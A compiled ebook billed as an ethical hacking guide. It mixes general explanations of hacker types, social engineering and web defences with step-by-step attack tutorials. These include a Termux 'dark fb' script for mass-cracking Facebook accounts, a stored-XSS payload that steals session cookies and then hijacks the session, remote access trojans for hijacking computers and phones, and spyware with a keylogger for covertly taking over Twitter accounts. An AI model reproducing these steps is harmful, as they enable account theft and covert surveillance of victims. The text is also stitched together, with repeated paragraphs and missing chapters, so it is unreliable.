The Ethical guide to computer hacking

By

Williams Evelyn

Contents
Guide To Computer Hacking..........................

Introduction...................................................

Black Hat Hackers..........................................

White Hat Hackers.........................................

'Grey Hat’.......................................................

Most Popular Hacking Technique -................

Different Types of Social Engineering

Attacks...........................................................

Common Hacking Tools...............................

Common Password Hacking Techniques.....

LEARN HOW TO HACK FOR BEGINNERS

FREE............................................................

The latest way to hack Facebook.................

How to Hack a Website: Hacking Websites Online

Example............................................

What is a web application? What are Web

Threats?.......................................................

How to protect your Website against

hacks............................................................

Website hacking tricks: Hack a Website

online...........................................................

How any Instagram account could be hacked in less than 10

minutes................................

The Best Way to Hack A Twitter Account........................................................

Accessing a wireless network......................

Wireless Network Authentication WEP &

WPA.............................................................

General types of attacks..............................

Tools used for hacking wireless networks...

Securing wireless networks.........................

How to hack IP addresses (proven way with

steps)...........................................................

What is an IP address?................................
How to find out someone’s IP address?....

Some misconceptions and old techniquee

How to Hack a Smartphone.......................

How to Hack a Smartphone, Part 2............

Conclusion.................................................
Introduction

Hacking often refers to the unauthorized intrusion into a network or

computer, normally carried out by one or more “hackers.” However, a hacker
can be anyone and their activities do not have to be malicious or unauthorized
to count as hacking. Hacking can mean using skills to achieve a goal in a
clever way.

They can be an individual like you or me. They can work solo or be
employed by an organization for good or for ill. Often, they look to alter
security systems to achieve their goal. There are many organizations that
hire hackers as a part of their staff. These hackers use their skills to
find vulnerabilities in the organization’s security. This is done to find and fix
the weaknesses and prevent malicious hackers from breaking into the security
system.

Types of Hackers White, black, and grey refer to the relationship between the
hacker and the systems they are attacking.
Black Hat Hackers

The term “black hat” originated from Western movies, where the bad guys
wore black hats and the good guys wore white hats. A black-hat hacker is an
individual who attempts to gain unauthorized entry into a system or network
to exploit them for malicious reasons.

The black-hat hacker does not have any permission or authority to

compromise their targets. They try to inflict damage by compromising
security systems, altering functions of websites and networks, or
shutting down systems.

They often do so to steal or gain access to passwords, financial information,

and other personal data.
White Hat Hackers

White-hat hackers, on the other hand, are deemed to be the good

guys, working with organizations to strengthen the security of a system.

A white hat has permission to engage the targets and to compromise

them within the prescribed rules of engagement. White-hat hackers are often
referred to as ethical hackers. This individual specializes in ethical hacking
tools, techniques, and methodologies to secure an organization’s information
systems. Unlike black-hat hackers, ethical hackers exploit security networks
and look for backdoors when they are legally permitted to do so. White-hat
hackers always disclose every vulnerability they find in the company’s
security system so that it can be fixed before they are being exploited by
malicious actors. Fortune 50 companies like Facebook, Microsoft, and
Google also use white-hat hackers.
'Grey Hat’

Hackers Grey hats exploit networks and computer systems in the way that
black hats do, but do so without any malicious intent, disclosing all loopholes
and vulnerabilities to law enforcement agencies or intelligence agencies.

Usually, grey-hat hackers surf the net and hack into computer systems to
notify the administrator or the owner that their system/network contains one
or more vulnerabilities that must be fixed immediately. Grey hats may also
extort the hacked, offering to correct the defect for a nominal fee.
Most Popular Hacking Technique -

Social Engineering Social engineering is a common term cybersecurity

professionals use to talk about the many ways we are all vulnerable to data
theft. The term social engineering usually means the process of taking
advantage of the human instinct to help someone in need to serve the purpose
of the criminal. The problem of social engineering has been evolving for
many years but today it is the main source of cyber attacks and cyber
terrorism. Malware installed via a technical flaw accounts for only 3% of
instances whereas social engineered attacks amount to a massive 97%.

The hacking pattern has changed from targeting of software or hardware to

more focused on human vulnerabilities.
Different Types of Social Engineering Attacks

Phishing

91% of data breaches come in the form of phishing, making it the most
exploited form of social engineering. Phishing is a type of cybercrime in
which emails are sent to the target in order to lure individuals to provide
personal information, banking and credit card details, email or social media
account passwords, or other confidential information.

Phishing scams often demonstrate the following characteristics:

• Trying to obtain personal information, passwords, or other bank related

details. • Sending shortened links that will redirect to compromised websites
that can track your details

. • Incorporating a sense of urgency, threat, or fear to manipulate the victim

to react before thinking.

A perfect example of this type of a social engineered attack is the phishing

scam that occurred a month after Tax Day in 2018 in the US when criminals
sent misleading emails asking for tax return details. This was done to obtain
access to accounts and use the information to file fraudulent tax returns.

Impersonation

Cybercriminals often look for the weakest link to compromise a system,

and that weakest link is often the humans. Impersonation requires a lot
of effort to understand the target and plan the attack, hence, this is the
least common form of social engineering. Some common roles that an
impersonator might take on to implement the attack are an IT executive, a
manager, an auditor, or a fellow employee.
Usually, impersonation attacks focus on roles with authority because when
people receive a request asking to share information from authoritative
persons, they will act immediately without verifying the true identity of the
sender.

Even though impersonation is not as commonly performed when compared to

other social engineering forms of attacks, the attacks have risen by nearly
400% in 2017.

Vishing

Voice phishing, or vishing, is growing rapidly as a form of social

engineering.

Vishing attacks are where an attacker will call into the target organization and
attempt to gain information and credentials over the phone. Another vishing
scam is where the attacker attempts to get the person on the other end of the
phone to perform some action on their PC.

These actions include running desktop scripts and viewing infected websites.
These attacks are difficult to monitor and trace and unfortunately, employees
working in HR departments, customer service, sales, and marketing, etc. are
highly vulnerable to these attacks. From 2012 to 2016, a group of cyber
criminals ran a massive IRS vishing scam.

During these four years, more than 15,000 victims in the United States lost
“hundreds of millions” of dollars to this sophisticated scam, and more than
50,000 individuals had their personal information compromised.

Smishing
Smishing is a portmanteau of “SMS phishing” which is similar to phishing
but is performed through text messages. Smishing criminals normally send
messages to contact numbers that they obtain through various black-hat
techniques like web-crawling, data breaches, or random number generators.

The messages sent by scammers use different techniques to get you to share
the information they are after. They may promise coupons or discounts on
desirable products or they may pose as your bank looking to verify your
account details. You may also receive texts from suspicious numbers like
“5000” or other numbers linked to email-to-text services which could be
automated.

As reported by NBC Nightly News, a smishing scam was attempted by

asking victims to activate their new credit card by entering private
information over the phone. In another smishing scam, users were informed
that their online accounts were expiring and that they were required to renew
their account by entering their passwords on a fake website.
Common Hacking Tools

To accomplish a perfect hack, hackers implement a wide variety of

techniques such as: Rootkits A rootkit is a program or set of software tools
that allow threat actors to gain remote access to control a computer system
that interacts or connects with the internet.

Originally, a rootkit was developed to open a backdoor in a system to fix

specific software issues. Unfortunately, this program is now used by hackers
to destabilize the control of an operating system from its legitimate operator
or user.

There are different ways to install rootkits in a victim’s system, the most
famous of them being social engineering and phishing attacks.

Once rootkits are installed in the system, it secretly allows the hacker
to access and control the system, giving them the opportunity to bring the
system down or steal crucial data.

Keyloggers

This is a specially designed tool that logs or records every key pressed on a
system. Keyloggers record every keystroke by clinging to the API
(application programming interface) when typed through the computer
keyboard.

The recorded file then gets saved, which includes data like usernames,
website visit details, screenshots, opened applications, etc.
Keyloggers can capture credit card numbers, personal messages, mobile
numbers, passwords, and other details as long as they are typed.

Normally, keyloggers arrive as malware that allows cybercriminals to steal

sensitive data. Vulnerability Scanners A vulnerability scanner classifies and
detects various system weaknesses in networks, computers, communication
systems, etc. This is one of the most common practices used by ethical
hackers to find potential loopholes and fix them on an immediate basis.

On the other hand, vulnerability scanners can also be used by black-hat

hackers to check the system for potential weak spots in order to exploit the
system. 5. Popular Software Used By Hackers and Criminals Apart from
using different attack techniques to crack and steal passwords from users and
organizations, cybercriminals tend to use password hacking and decrypting
software.

Here are some popular ones:

John The Ripper (JTR) This software is designed to crack open some of the
most complicated passwords, as it can crack passwords ‘offline.’ JTR takes
different text string samples, commonly referred to as ‘wordlists,’ that
contain complex and popular words found in the dictionary or real passwords
which were cracked before.

This tool uses both the key and encryption algorithm and compares the output
to the encrypted string. JTR can also be used to perform a variety of
alterations towards dictionary attacks.

Aircrack-ng This tool/software is used to crack wireless passwords; the tool

is very effective when used by a trained user.

Aircrack-ng is an 802.11 WPA-PSK and WEP keys cracking software which

can recover passwords when sufficient data packets are captured in monitor
mode. Professionals who are experienced in penetration testing and auditing
wireless networks can get the best results from this software.
Cain and Abel

This extremely popular tool is often referred to as just ‘Cain.’ At its core, the
Cain and Abel Password Hacking Tool is used to recover passwords for
Microsoft Windows but can also be used as a password cracking tool by
hackers and criminals worldwide. THC Hydra This tool is similar to JTR,
except for the fact that THC Hydra works online.

This hacking tool supports a variety of network protocols such as LDAP,

SSH, VNC, Mail (IMAP, POP3, etc.), SMB, and databases. THC Hydra is an
essential hacking tool to log into a stable network, using a dictionary and
brute-force attacks to crack open complicated tough passwords present in the
login page.
Common Password Hacking Techniques

SQL Injection Attack Structured Query Language (SQL) is designed to

exploit the data in a database. SQL Injection is a type of cyber-attack that
targets databases through SQL statements to trick systems.

This kind of attack is executed via a website interface that attempts to issue
SQL commands through a database to hack usernames, passwords, and other
database information. Web applications and websites that are poorly coded
are prone to SQL injection attacks because these web-based applications
contain user-input fields (such as search and login pages, product and support
request forms, comments section, etc.) that are vulnerable and can be easily
hacked by manipulating the codes.

Distributed Denial-of-Service (DDoS)

DDoS is a type of malicious attack that distorts normal traffic to enter a

server, flooding the network traffic (resulting in a denial of service). It acts
like a traffic jam that clogs the road and prevents regular traffic from
arriving at their destination. Devices that easily connect to the network
(such as computers, IoT devices, mobile phones, etc.) are prone to DDoS
attacks.

The Guessing Game As the name suggests, this technique relies completely
on guessing the password of a user. Passwords like ‘password’, ‘qwerty’,
‘admin’, ‘default’, your name, or even your birthday are commonly used to
set default passwords. If the user has not changed the default password or if
the user is careless while setting a new password, then they can be hacked
easily.
Brute Force Attack

A brute force attack is one of the most common techniques used by hackers
and cybercriminals against web applications. The main focus of such an
attack is to gain access to user accounts using a trial-and-error technique to
guess a user’s password or personal identification number (PIN).

A brute force attack methodically tries one password after another until the
attacker successfully logs in to the target account. For example, the
attacker will use automated tools to try Password, then Password1,
Password2, Password3, etc. and iterate through every possible option within a
defined keyspace (a-z, A-Z, 0-1, etc.) By using bots to test random
combinations of lower and upper case alphabets and numbers to generate the
right password to your account in a couple of seconds, the attacker can gain
access to your account!

There is a similar attack technique known as reverse brute force attack where
instead of hacking a specific user, the hacker attempts to hack multiple
accounts using a single commonly-used password.

Dictionary Attack

A dictionary attack uses a pre-defined wordlist in a systematic process

against individual usernames or usernames of an entire organization to gain
access to the system. The possibility of a hacker gaining access using this
method is high as many users often use basic words that can be found in the
dictionary as passwords.

Wordlists are available for nearly every language (real and fictional) and are
even separated into genres or themes. For example, if your server is named
Gandalf, then a Middle Earth dictionary file that contains words and
languages from the Lord of the Rings books and movies might be effective.
The best way to deter a dictionary attack is to use a multiple-word (random
combination of lowercase, uppercase characters with numerals) password..

Hacking have taken over everything with the growing technology. Each day
new technology gadget and gears are getting introduced in the market. Few
years back there wasn’t a concept of mobile phone but now every kid is
having a smartphone in their pocket. Big giant ordinary television
transformed into slim and smart LEDs. Computers with tons of equipments
have been packed into a small box with powerful things inside.

With the technology evolution, threats to privacy also have raised to peak.
Every new gadget opens more doors to the intruders and hackers and threat to
your privacy. There’s not a single machine which can guarantee hundred
percent of security. Every day hundreds of devices get hacked and
confidential information is leaked to the world.
LEARN HOW TO HACK FOR BEGINNERS FREE

There’s thousands of devices which make threat to online privacy and tons of
ways to penetrate into these devices. Explore all the major hack type which
might affect your privacy. Learn how to hack for beginners free and secure
from all these type of hacks.

1. COMPUTER HACKING

Computer is the one of the main device that opened up the big gates to the
hacking world. All the personal activities and business matters have been
moved to the computers. Each company migrated from the ordinary business
management to the centralized computer management system for their
business activities. With the rise of computers in the business industry, it
made confidential information more open to the hackers and intruders.

Computers can be hacked so easily and can get all the personal data leaked
with just few simple techniques. There’s one reason why hacking a computer
is very easy and simple than the other devices because most of the
organization doesn’t train their employees for the complete computer
operations and security measurements. Every company should give proper
training to the employee for a secure system.

So, how computers can be hacked? Well, there’s tons of ways a computer can
be hacked. Some needs physical access to the machine while some can hack a
computer remotely. There’s are most common way hackers use to get into a
computer is through a tool known as RAT (Remote Administration Tool).
There’s tons of remote administration tools in the market that can easily let
intruder hack into a computer remotely. Some most popular are:

Nanocore

Blackshades

NjRAT

JSpy

DarkComet

You can explore a list of all the top remote administration tools of 2020. As
most the beginners don’t know how to work with these tools. Well, to make it
easier for the newbies we have made some complete step by step tutorials to
hack a computer remotely with these RATs that can lead to learn how to hack
for beginners free. You can check out this how to hack a computer remotely
with njrat or even can learn hacking a computer remotely with Kali Linux as
well .

There are some other ways as well to hack into the computers but this is the
most common method which hackers use to get into a remote computer. And
plus point is this method has a huge success ratio.

2. SMARTPHONE HACKING

Mobile phone have evolved to the next level and became smart with the
passage of time. As we all know these smartphones have taken over all the
things which we were used to do on a computer. Now smartphones gives you
all of your computer operations in your hand. Sending an email, managing
business meetings, official video conferences and meeting as well
entertainment like watching movies, playing games and all the other things
are now accessible through a smartphone.

Smartphone’s one of the major usage is a personal messaging conversations

and email usage for the work. As smartphones make life easier and all the
things accessible from your hand, it also gave birth to some privacy threats
that any personal messaging conversation, private media or other business
confidential information can be hacked which can put victim through a hard
time.

Questions rises how these smartphones can be hacked? Well answer is very
straight forward and easy. Smartphones can be hacked through various
methods but like the computer hacking, smartphones can be hacked through
remote administration tools easily and that’s the reason this method is very
popular and most common that every intruder tr to get into a remote mobile
phone using some android rats.

There’s tons of remote administration tools in the market that can easily let
intruder hack into a computer remotely. Some most popular are:

AndroRAT

SpyMax

DroidJack

SpyNote

Dendroid
You can explore a list of all the top android remote administration tools of
2020. As most the beginners don’t know how to work with these tools. It
might be tricky for most of the users to hack a smartphone using these tools.
So to overcome this issue, we have made complete step by step tutorials on
how to hack a smartphone remotely. You can explore the following tutorials
to learn how to hack for beginners free.

Hacking a smartphone remotely using androrat

Hack smartphone remotely using droidjack

Hack any android phone remotely with spynote

You would probably learn all to hack a smartphone with these complete step
by step tutorials designed for the beginners as well for the pros. Also explore
the list of 25 top Android hacking apps of 2020.

3. FACEBOOK HACKING

Facebook is the world’s giant social network where each day millions of
people post and make conversations with their friends and family. Everybody
uses facebook for chatting with their buddies and what if these conversations
can be hacked and leaked to the open world? It might become scary if any
confidential information get leaked.

Is it really possible to hack a facebook account? Of course it’s possible with

various techniques. Some of the most common techniques that can lead to fb
account hack are as follow:

Hacking a Facebook Account through Phishing

Hijacking Cookies to Takeover a Facebook Account

Hacking a Facebook Account through Desktop Phishing

There’s variety of other methods as well but these are the most common with
highest success ratio.

4. WEBSITE HACKING

Online information works on the websites also known as www (world wide
web). All the internet is a combination of different networks which host
websites. These websites share information with the world. There’s various
type of websites some are personal while other are for business. Every
website over the internet can be a victim of the attack. Each day hundreds of
the websites get hacked and it’s user’s data is leaked.

If a website’s data gets into the wrong hands it might make a real hard
problem. Question is how these website are hacked? Answer isn’t that simple
to this type of hacking as websites are hosted on different networks and to
hack into a website is a bit difficult unlike the computer hacking.

There’s plenty of ways to hack a website, it depends on the security loophole.

Hacker keeps on testing all the different options until he finds a security
loophole with any of these methods. These are the most commonly used
website hacking methods by the penetration testers and hackers.

Website Hacking with SQL Injection

Hacking a Website with XXS or Cross Site Scripting

CSRF (Cross Site Request Forgery) Exploitation

RFI (Remote File Inclusion) Attack

There are plenty of other ways but these are the most commonly used website
hacking methods. If a website is powered with WordPress then you can check
out the following dedicated ways to hack a wordpress based website.

Hack a WordPress Wesbite with SQLMap

WordPress Website Hacking with WPScan

Hope these articles will give a wide angle of understanding and you will learn
all about website hacking with these most popular methods to hack a website.

5. WIRELESS HACKING (WIFI HACKING)

Internet connections have moved to Wireless from the ordinary wired

connections. It made very hassle free and flexible connectivity. Devices can
be connected to the internet no matter you are on the sofa or on the bed, can
easily access the internet.

As data is transmitted through the WiFi in the air it opens many security
loopholes as you network can be accessed or hacked for free internet. Data
packets can be captures and personal or confidential information can get into
dirty hands which might put in serious trouble.

There’s tons of software and tools which let you get into someone’s wireless
network and can help you to capture packets as well. You can check out few
of the most popular wireless hacking related tools and tutorials.
How to Hack a Wifi Password

Wifi Deauthentication Attack

Wireshark Network Analyzer

CowPatty Wifi Password Cracking Tool

Aircrack-ng

There’s plenty of other tools and apps for wifi hacking and analysis.

6. IP HACKING

IP (Internet Protocol) address is the unique address allocated to the each user
over the internet. Every user over the internet has a unique IP address that no
other can have all over the world. In simple world, it’s like a home address
that no other can have the same address as yours. And data is trasmmitted
over the IP address among different machines.

IP address can be hacked easily that can leak your connection information as
well your home location from where you accessing the internet. Anybody can
get to your home if he know your IP and can track down like just in
hollywood movies. There’s many ways to garb someone’s IP address.

Some of best ip grabbers out can check out in this article. And if you are
playing the games and wanted to know your opponent players IP, you can use
the Octosniff Xbox IP sniffer. Even you can find out the IP address of the
skype users by their username and can know from where they are originally
connected. You can downloaad skype resolver that can resolve skype
username IP addresses.
The latest way to hack Facebook

This method of hacking Facebook is a method that can be used by hackers to

hack Facebook accounts.

In this article we will try to hack Facebook accounts using the latest dark fb
on termux.

Dark fb is a Facebook hack tool used to hack FB.

This update is the latest mass dark fb script, you don't need to log in.

The latest anti check points fb hack script is the latest dark fb script.

You can hack fb using termux without logging in.

So your Facebook account will not be subject to Facebook sessions or check

points.

As usual, to use the latest dark fb script, there are several modules that must
be installed, namely:

pkg install python2

pip2 install tqdm

pip2 install requests

pip2 install mechanize

If so, proceed to the installation of the latest Termux Facebook hack script
anti check points.

Please see the command to install Facebook hack tools at the following link.
Next, run the command below to use the latest dark fb script:

cd Sensei

python2 main.py

There are 4 options or menu options here:

[01] Crack Using Mobile Phone Enter command 01 to hack Facebook using
your mobile number

[02] Crack Using Email and enter command 02 to hack facebook account
using email address

[03] Crack From Friendslist & Public [LOGIN] select 03 if you are going to
hack the target’s Facebook account or from the list of friends (be careful to
check points, OK!)

[00] Exit this program last select 00 to log out

Here I select number 01 which is hack fb from phone number.

Now choose which country you will hack the facebook account with.

There are 5 countries where you can hack Facebook accounts:

[01] Crack Account Indonesia

[02] Crack Account Bangladesh

[03] Crack Account Pakistan

[04] Crack Account India

[05] Crack Account Vietnam

[00] Back To Menu

In this example I chose Indonesia, so type the command number 01 to
continue.

In the next section we have to enter a 3 digit number.

These 3 digit numbers will later function to hack Facebook accounts using
the phone numbers of the 3 numbers

For example, the number you are going to hack Facebook is +628123987
***** so we enter the number 123 (3 numbers behind +628 ....)

This Facebook hack tool will try to log into 2000 accounts using numbers
beginning with +628123 **** ?.

Wait for the cracking process to complete.

That’s the latest way to hack Facebook to hack someone else’s fb account
100% works.
How to Hack a Website: Hacking Websites Online Example

More people have access to the internet than ever before. This has prompted
many organizations to develop web-based applications that users can use
online to interact with the organization. Poorly written code for web
applications can be exploited to gain unauthorized access to sensitive data
and web servers.

In this tutorial you will learn how to hack websites, and we will introduce
you to web application hacking techniques and the counter measures you can
put in place to protect against such attacks.
What is a web application? What are Web Threats?

A web application (aka website) is an application based on the client-server

model. The server provides the database access and the business logic. It is
hosted on a web server. The client application runs on the client web browser.
Web applications are usually written in languages such as Java, C#, and
VB.Net, PHP, ColdFusion Markup Language, etc. the database engines used
in web applications include MySQL, MS SQL Server, PostgreSQL, SQLite,
etc.

Most web applications are hosted on public servers accessible via the
Internet. This makes them vulnerable to attacks due to easy accessibility. The
following are common web application threats.

SQL Injection – the goal of this threat could be to bypass login algorithms,
sabotage the data, etc.

Denial of Service Attacks– the goal of this threat could be to deny legitimate
users access to the resource

Cross Site Scripting XSS– the goal of this threat could be to inject code that
can be executed on the client side browser.

Cookie/Session Poisoning– the goal of this threat is to modify

cookies/session data by an attacker to gain unauthorized access.

Form Tampering – the goal of this threat is to modify form data such as
prices in e-commerce applications so that the attacker can get items at
reduced prices.

Code Injection – the goal of this threat is to inject code such as PHP, Python,
etc. that can be executed on the server. The code can install backdoors, reveal
sensitive information, etc.

Defacement– the goal of this threat is to modify the page been displayed on a
website and redirecting all page requests to a single page that contains the
attacker’s message.
How to protect your Website against hacks

An organization can adopt the following policy to protect itself against web
server attacks.

SQL Injection– sanitizing and validating user parameters before submitting

them to the database for processing can help reduce the chances of been
attacked via SQL Injection. Database engines such as MS SQL Server,
MySQL, etc. support parameters, and prepared statements. They are much
safer than traditional SQL statements

Denial of Service Attacks – firewalls can be used to drop traffic from

suspicious IP address if the attack is a simple DoS. Proper configuration of
networks and Intrusion Detection System can also help reduce the chances of
a DoS attack been successful.

Cross Site Scripting – validating and sanitizing headers, parameters passed

via the URL, form parameters and hidden values can help reduce XSS
attacks.

Cookie/Session Poisoning– this can be prevented by encrypting the contents

of the cookies, timing out the cookies after some time, associating the
cookies with the client IP address that was used to create them.

Form tempering – this can be prevented by validating and verifying the user
input before processing it.

Code Injection - this can be prevented by treating all parameters as data

rather than executable code. Sanitization and Validation can be used to
implement this.
Defacement – a good web application development security policy should
ensure that it seals the commonly used vulnerabilities to access the web
server. This can be a proper configuration of the operating system, web
server software, and best security practices when developing web
applications.
Website hacking tricks: Hack a Website online

In this website hacking practical scenario, we are going to hijack the user
session of the web application located at www.techpanda.org. We will use
cross site scripting to read the cookie session id then use it to impersonate a
legitimate user session.

The assumption made is that the attacker has access to the web application
and he would like to hijack the sessions of other users that use the same
application. The goal of this attack could be to gain admin access to the web
application assuming the attacker’s access account is a limited one.

Getting started

Open http://www.techpanda.org/

For practice purposes, it is strongly recommended to gain access using SQL

Injection. Refer to this article for more information on how to do that.

The login email is admin@google.com, the password is Password2010

If you have logged in successfully, then you will get the following dashboard

Click on Add New Contact

Enter the following as the first name

<a href=#
onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?
c=\'+escape\(document.cookie\)\;\">Dark</a>

HERE,

The above code uses JavaScript. It adds a hyperlink with an onclick event.
When the unsuspecting user clicks the link, the event retrieves the PHP
cookie session ID and sends it to the snatch_sess_id.php page together with
the session id in the URL.

Enter the remaining details

Click on Save Changes

Since the cross site script code is stored in the database, it will be loaded
everytime the users with access rights login

Let’s suppose the administrator logins and clicks on the hyperlink that says
Dark

He/she will get the window with the session id showing in the URL.

Note: the script could be sending the value to some remote server where the
PHPSESSID is stored then the user redirected back to the website as if
nothing happened.

Note: the value you get may be different from the one in this webpage
hacking tutorial, but the concept is the same.

Session Impersonation using Firefox and Tamper Data add-on.

The flowchart below shows the steps that you must take to complete this
exercise.
You will need Firefox web browser for this section and Tamper Data add-on

Open Firefox and install the add.

Search for tamper data then click on install

Click on Accept and Install…

Click on Restart now when the installation completes

Enable the menu bar in Firefox if it is not shown

Click on tools menu then select Tamper Data

You will get the following Window. Note: If the Windows is not empty, hit
the clear button

Click on Start Tamper menu

Switch back to Firefox web browser, type

http://www.techpanda.org/dashboard.php then press the enter key to load the
page

You will get the following pop up from Tamper Data

The pop-up window has three (3) options. The Tamper option allows you to
modify the HTTP header information before it is submitted to the server.

Click on it

You will get the following window

Copy the PHP session ID you copied from the attack URL and paste it after
the equal sign. Your value should now look like this

PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
Click on OK button

You will get the Tamper data popup window again

Uncheck the checkbox that asks Continue Tampering?

Click on submit button when done

You should be able to see the dashboard

Note: we did not login, we impersonated a login session using the

PHPSESSID value we retrieved using cross site scripting.
How any Instagram account could be hacked in less than 10 minutes

A security researcher has been awarded $30,000 after discovering a serious

vulnerability that could potentially have put any Instagram account at risk of
being hacked.

Following a recent increase in rewards offered for the discovery of critical

account takeover vulnerabilities in Facebook and Instagram, Indian security
researcher Laxman Muthiyah chose to take a close look at the photo-sharing
service.

As he describes in a blog post, Muthiyah explored whether there might be a

vulnerability in how Instagram handled password reset requests for users who
have forgotten their login credentials.

Mutiyah found that when users asked for a password reset via Instagram’s
web interface, the site would email a reset link to the user’s email account.

A security researcher has been awarded $30,000 after discovering a serious

vulnerability that could potentially have put any Instagram account at risk of
being hacked.

Following a recent increase in rewards offered for the discovery of critical

account takeover vulnerabilities in Facebook and Instagram, Indian security
researcher Laxman Muthiyah chose to take a close look at the photo-sharing
service.

As he describes in a blog post, Muthiyah explored whether there might be a

vulnerability in how Instagram handled password reset requests for users who
have forgotten their login credentials.

Mutiyah found that when users asked for a password reset via Instagram’s
web interface, the site would email a reset link to the user’s email account.
After a few minutes of testing Mutiyah couldn’t find any bugs, and so turned
his attention instead to how smartphone users recover access to their
Instagram accounts.

What Mutiyah found was that Instagram offered the option for users locked
out of their accounts to request that a six-digit secret security code be sent to
their mobile phone number or email account. If that passcode is entered, a
user can regain access to their Instagram account.

In theory, if a hacker could enter the six-digit security code they would be
able to break into the Instagram account (and reset the password locking out
the legitimate owner.)

Now, that passcode could potentially be stolen if a hacker had somehow

managed to gain access to their target’s email account, or had hijacked
control of their victim’s mobile phone number via a SIM swap scam. But
Mutiyah wondered if there might be another way to break into accounts if
neither of those options were available.

Mutiyah realised that all a hacker would need to do was enter the correct six
digit code – a code that could be any combination between 000000 and
999999 – within the ten minute window Instagram would accept the code
before expiring it.

Up to one million numbers to be entered within ten minutes, in order to

change an Instagram account’s password.

Of course, the likes of Facebook and Instagram aren’t going to simply sit
quietly as an automated script tries a brute force attack to guess the correct
security code. Instead they have rate-limiting in place to detect when multiple
attempts have been made to get past the security check and slow down
subsequent attempts – meaning the ten minute window of opportunity
expires.
In Mutiyah’s tests he discovered that when he cycled through 1000 attempts
to guess an Instagram account’s security codes, 250 of them went through
and the subsequent 750 requests were rate limited.

However, after a few days of testing the researcher was able to discover that
Instagram’s rate limiting mechanism could be bypassed by rotating IP
addresses (in other words, not using the same computer to brute force the
recovery code) and sending concurrently from different IP addresses..

Sending concurrent requests using multiple IPs allowed me to send a large

number of requests without getting limited. The number of requests we can
send is dependent on concurrency of reqs and the number of IPs we use.
Also, I realized that the code expires in 10 minutes, it makes the attack even
harder, therefore we need 1000s of IPs to perform the attack.”

Mutiyah says that he used 1000 different machines and IPs to achieve easy
concurrency, and sent 200,000 requests in his tests. He shared a YouTube
video with Facebook and Instagram’s security team to demonstrate the attack
in action:

Of course, 200,000 requests isn’t quite the million requests that would be
necessary to guarantee the correct recovery passcode would be entered to
allow an Instagram account to be hijacked.

Mutiyah’s investigation concludes that in a real attack, 5000 IP addresses

would be needed to hack an Instagram account. Although that sounds like a
large number, it can actually be easily achieved at a low price (Mutiyah says
there would be approximately US $150 cost if a cloud provider like Google
or Amazon was used).

All Instagram users should be grateful that Laxman Muthiyah chose to

responsibly disclose the security vulnerability to Instagram’s security team
rather than monetise his discovery by selling it to online criminals.

It’s easy to imagine that a technique like this would be very attractive to
many hackers interested in compromising Instagram accounts, and they
might be prepared to pay much more than the $30,000 Muthiyah received in
the form of a bug bounty.

All internet users are reminded to better secure their online accounts with
strong, unique passwords and to enable two-factor authentication wherever
possible.
The Best Way to Hack A Twitter Account

After a dozen unsuccessful hacker attempts, you feel nervous and irritated
trying to hack into a Twitter account again and again. This is where special
hacking software and keyloggers can help you complete the secret mission.
PanSpy is such a powerful mobile phone tracking application that enables
you to access someone's Twitter account secretly. This app can be used for
many purposes as it has many features as compared to any other spy apps.
You can use this application for hacking messages, location, contacts, call
logs, Keylogger, Apps, E-mails and much more on any Android devices
including Samsung, Huawei, HTC, Oppo, Sony, LG that is running on
Android version 5.0 or later.

Why Choose This Tool to Hack A Twitter Account:

Track Cell Phone Activity: Call logs, Messages, E-mails, Document,

Calendar, Photo, Video, Apps and more

Track Current Location: GPS, Geofencing, WiFi logger

Monitor Social Apps: Whatsapp, Skype, Facebook, Instagram, Snapchat,

Line, Kik, Tinder, Hangouts and more

Remote Control: App blocker, Schedule restriction

Three Steps to Hack A Twitter Account

Step 1: Subscribe PanSpy.

Create an account on PanSpy first by visiting PanSpy official website, click

on Sign Up button. Use an authentic email address to sign up PanSpy. After
successfully created a PanSpy account, it will send a confirmation link to
your Email to activate your account, simply navigate to your Email address,
tap the link to activate your account, then follow the Setup Wizard to finish
the following setup process.

Step 2: Select A Subscription and Install Application .

Select a subscription from the two editions: Premium Edition, Ultimate

Edition. Both editions support for 1-month subscription, quarter subscription
and 1-year subscription.

After successfully subscribed the service, you will get a download link,
simply download and setup the PanSpy app. Then login your PanSpy
account, and follow the instructions given to set and give the app permission
to access data on the monitored mobile phone. Once you completed all
process and started the service, you can choose to delete the app icon or keep
it on the home screen.

Step 3: Start Hacking the Twitter Account.

Now, turn back to computer Control Panel, you have complete unrestricted
access to the phone and you can easily hack twitter account. To get the
Twitter password, simply use PanSpy’s Keylogger feature. However, that's
not it, you can also use it to hack Viber, Snapchat, WhatsApp, Line,
WhatsApp, etc.
Accessing a wireless network

As you may know that a wireless network is a network that is connected

without using any wires. These are the networks that use radio waves to link
computers and other devices together.

To access these networks you’ll need:

A device that has wireless-network enabled (laptop, smartphone, etc.)

The device as well as you will need to be within the transmission radius of a
wireless network access point (a WiFi router)

If the network isn’t password protected then you wouldn’t need to do

anything further to gain access except click on it. It was asking to get hacked.

But if the network is password protected like most, then you’ll need its
password to gain access.
Wireless Network Authentication WEP & WPA

There are many authentication techniques used in various wireless network

devices. These include: WEP, WPA, WPA2, WPA3, WPA2 + AES, WPA +
AES, WPA + TKIP/AES, WPA + TKIP, and more

WEP and WPA are two of the most commonly used authentication
techniques in a wireless network. Understanding these two is good for
building a solid foundation before learning how to hack into a wireless
network.

It will also help you gather the required information regarding the access
point.

WEP

WEP (Wired Equivalent Privacy) is a security algorithm for IEEE 802. It was
developed with the intention to overcome the data confidentiality issues with
the traditional wired connection. It gave better data protection by encrypting
the data transmitted to avoid eavesdropping.

WEP authentication works using two methods:

Open System Authentication (OSA) – OSA helps you gain access to any
WEP network as well as receive files that aren’t encrypted

Shared Key Authentication (SKA) – SKA allows a computer equipped with a

wireless modem to gain full access to any WEP network and exchange both
encrypted and unencrypted data.

WPA

The weaknesses found in WEP led to the development of Wi-Fi Protected

Access. WPA became the security standard for computing devices with
wireless internet connections.

WPA encrypts data on 802.11 WLANs. In addition to this, instead of using

the 24-bits that WEP uses, WAP uses 48bits that gives it higher initial values.
However, WPA has been reported to get affected by a DDoS attack many
times.
General types of attacks

Man-in-the-middle attack : This refers to intercepting the communication

between two individuals to steal data.

Denial of service (DDoS) : To do this, you have to overwhelm the network

with traffic. As a result, it cannot fulfill any requests, leaving the system
unusable

Sniffing : It involves intercepting data packets as they are transmitted over a

network.

In addition to the above, there are various types of attacks that can
compromise computer network security that can be useful in both types of
hacking.

Understanding these attacks will not only help you understand how to hack
into a network but also learn cybersecurity. Moreover, it will also help you
become an ethical hacker.
